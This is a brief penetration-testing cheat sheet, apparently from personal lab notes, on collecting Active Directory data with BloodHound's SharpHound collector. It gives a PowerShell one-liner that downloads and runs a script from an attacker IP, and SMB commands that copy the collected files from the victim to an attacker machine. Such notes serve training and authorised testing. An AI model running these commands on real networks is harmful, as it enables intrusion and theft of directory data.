Bloodhound
The following tool aclpwn.py by foxit identifies and exploits ACL based privilege escalation paths
Copy SharpHound to the Victim
The first thing to do is copy the ShapHound.ps1
script to the victim
iex(new-object net.webclient).downloadstring('http://10.10.14.4/SharpHound.ps1')
Run the Collector
invoke-bloodhound -collectionmethod all
Get the Collected Files from the Victim
I like to use the impacket smbserver.py
script
# On my Kali Box
smbserver.py -smb2support share /tmp/smb -username wasabi -password wasabi123
# On the victim
net use \\10.10.11.12\share /u:wasabi wasabi123
# Now we can copy the files from the victim to our Kali box
copy XXXXXXX_Bloodhound.zip \\10.10.11.12\share\
Last updated